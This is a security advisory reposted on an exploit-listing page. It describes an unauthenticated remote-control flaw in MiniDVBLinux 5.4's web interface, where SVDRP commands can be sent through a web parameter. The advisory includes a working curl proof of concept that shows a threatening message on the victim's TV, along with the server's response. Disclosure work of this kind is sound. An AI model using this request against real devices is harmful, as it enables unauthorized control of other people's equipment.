Share 
## https://sploitus.com/exploit?id=PACKETSTORM:168732
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit  
  
  
Vendor: MiniDVBLinux  
Product web page: https://www.minidvblinux.de  
Affected version: <=5.4  
  
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple  
way to convert a standard PC into a Multi Media Centre based on the  
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this  
Linux based Digital Video Recorder: Watch TV, Timer controlled  
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration  
via browser, and a lot more. MLD strives to be as small as possible,  
modular, simple. It supports numerous hardware platforms, like classic  
desktops in 32/64bit and also various low power ARM systems.  
  
Desc: The application allows the usage of the SVDRP protocol/commands  
to be sent by a remote attacker to manipulate and/or control remotely  
the TV.  
  
Tested on: MiniDVBLinux 5.4  
BusyBox v1.25.1  
Architecture: armhf, armhf-rpi2  
GNU/Linux 4.19.127.203 (armv7l)  
VideoDiskRecorder 2.4.6  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2022-5714  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php  
  
  
24.09.2022  
  
--  
  
  
Send a message to the TV screen:  
  
curl http://ip:8008/?site=commands&section=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU!  
  
220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8  
250 Message queued  
221 mld closing connection  
  
For more commands:  
- https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands